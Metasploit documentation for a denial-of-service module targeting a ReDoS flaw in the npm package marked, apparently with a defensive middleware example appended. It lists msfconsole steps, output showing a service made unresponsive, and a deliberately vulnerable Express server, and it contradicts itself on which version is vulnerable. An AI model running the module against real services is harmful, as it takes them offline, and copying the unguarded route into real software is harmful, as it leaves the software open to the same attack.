metasploit-gs/documentation/modules/auxiliary/dos/http/marked_redos.md
2020-03-24 09:36:17 -04:00

## Vulnerable Application

This auxiliary module exploits a Regular Expression Denial of Service (ReDoS) vulnerability in the npm module marked. The vulnerable regular expression is the one used for "heading" processing. Versions before 0.3.19 are vulnerable. Any application that uses a vulnerable version of this module and passes untrusted input to it is affected.

## How to Install

To install a vulnerable version of marked, run:

```
npm i marked@0.3.19
```

## Verification Steps

  1. Create a new directory for the test application.
  2. Copy the example server below into the test application directory as `server.js`.
  3. Run `npm i express` to install express in the test application directory.
  4. To test a vulnerable version of the module, run `npm i marked@0.3.19` to install a vulnerable version of marked.
  5. To test a non-vulnerable version of the module, run `npm i marked` to install the latest version of marked.
  6. Once all dependencies are installed, run the server with `node server.js`.
  7. Open a new terminal.
  8. Start `msfconsole`.
  9. `use auxiliary/dos/http/marked_redos`
  10. `set RHOST [IP]`
  11. `set HTTP_METHOD get` (optional)
  12. `set HTTP_PARAMETER foo` (required)
  13. `set TARGETURI /path/to/vulnerable/route` (optional)
  14. `run`
  15. Against a vulnerable installation, the module should report success and the test application should accept no further requests.
  16. Against a non-vulnerable installation, the module should report failure and the test application should keep accepting requests.

## Scenarios

### marked npm module version 0.3.19

Expected output for successful exploitation:

```
[*] Testing Service to make sure it is working.
[*] Test request successful, attempting to send payload
[*] Sending ReDoS request to 192.168.3.24:3000.
[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
[*] Testing for service unresponsiveness.
[+] Service not responding.
[*] Auxiliary module execution completed
```

## Example Vulnerable Application

```javascript
// npm i express body-parser
// npm i marked@0.3.19 (vulnerable)
// npm i marked (non-vulnerable)

const marked = require('marked');
const express = require('express');
const bodyParser = require('body-parser');

const app = express();
app.use(bodyParser.text({ type: 'text/html' }));

// create application/x-www-form-urlencoded parser for the POST route
const urlencodedParser = bodyParser.urlencoded({ extended: false });

// GET /?foo=<markdown>: the untrusted query parameter is passed straight to marked
app.get("/", urlencodedParser, function(req, res) {
  const result = req.query.foo ? marked(req.query.foo) : 'nothing';
  res.end(result);
});

// POST /cat with form field bar=<markdown>: the untrusted body field is passed straight to marked
app.post("/cat", urlencodedParser, function(req, res) {
  const result = req.body.bar ? marked(req.body.bar) : 'nothing';
  res.end(result);
});

app.listen(3000, '0.0.0.0', function() {
  console.log('Application listening on port 3000 on all interfaces!');
});
```
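Both routes in the test server hand request-controlled text to `marked` with no limit on its size, which is the property the module exploits. The following is an added example, not code from marked, express or the Metasploit module, showing the guards a practitioner would put in front of such a route: a byte cap on the markdown field, which is the control that actually bounds the regex engine's backtracking work, and a timing wrapper that records how long each render took so that renders over budget surface in logs and alerts. The helper names, the 4096-byte cap and the 50 ms budget are assumptions for the example and should be tuned to the real content size and the measured latency of the installed version. A synchronous regex cannot be interrupted from the thread that runs it, so a hard timeout would additionally require rendering in a `worker_threads` worker or child process that can be terminated; the length cap is what keeps the main thread responsive.

```javascript
// Added example (not part of marked, express or the Metasploit module): request-side
// guards for a route that hands untrusted text to a synchronous markdown renderer.
// MAX_MARKDOWN_BYTES and RENDER_BUDGET_MS are assumed values for this example.

const MAX_MARKDOWN_BYTES = 4096;   // hard cap on the markdown field; bounds backtracking work
const RENDER_BUDGET_MS = 50;       // telemetry threshold, not a hard timeout

// Validate the untrusted field before it reaches the renderer. Express may parse a
// repeated query parameter (?foo=a&foo=b) as an array, so the type check matters.
function checkMarkdownInput(text, maxBytes = MAX_MARKDOWN_BYTES) {
  if (typeof text !== 'string') {
    return { ok: false, reason: 'expected a single string value' };
  }
  const bytes = Buffer.byteLength(text, 'utf8');
  if (bytes > maxBytes) {
    return { ok: false, reason: `input is ${bytes} bytes, limit is ${maxBytes}` };
  }
  return { ok: true, bytes };
}

// Run a synchronous renderer (for example marked) and measure the time it took.
// overBudget is the signal to log or alert on; it cannot stop a render in progress.
function timedRender(render, text, budgetMs = RENDER_BUDGET_MS) {
  const start = process.hrtime.bigint();
  const html = render(text);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { html, elapsedMs, overBudget: elapsedMs > budgetMs };
}

// Express-style middleware factory: `pick` selects the untrusted field from the
// request (req.query.foo for the GET route, req.body.bar for the POST route).
// Oversized or malformed input is rejected with 413 before the handler runs.
function markdownGuard(pick, maxBytes = MAX_MARKDOWN_BYTES) {
  return function (req, res, next) {
    const text = pick(req);
    if (text === undefined) return next();       // the route already handles "nothing"
    const verdict = checkMarkdownInput(text, maxBytes);
    if (!verdict.ok) {
      res.statusCode = 413;
      return res.end(`rejected: ${verdict.reason}`);
    }
    return next();
  };
}

// How the guards slot into the test server above (assumed wiring, not run here):
//   app.get('/', markdownGuard(req => req.query.foo), function (req, res) {
//     const r = timedRender(marked, req.query.foo);
//     if (r.overBudget) console.warn(`slow render: ${r.elapsedMs.toFixed(1)} ms`);
//     res.end(r.html);
//   });

if (typeof module !== 'undefined') {
  module.exports = { MAX_MARKDOWN_BYTES, RENDER_BUDGET_MS, checkMarkdownInput, timedRender, markdownGuard };
}
```

The guard is deliberately placed as middleware rather than inside the handler so that every route rendering markdown gets the same cap, and the rejection is visible as a distinct status code in the access log, which pairs with length-based detection on the proxy side.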